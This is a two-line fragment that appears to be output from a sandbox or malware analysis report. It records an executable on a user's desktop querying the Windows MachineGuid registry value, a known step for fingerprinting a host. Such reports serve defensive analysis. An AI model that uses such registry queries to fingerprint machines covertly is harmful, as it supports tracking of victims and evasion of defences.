Source: C:\Users\user\Desktop\pj31M24DLn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid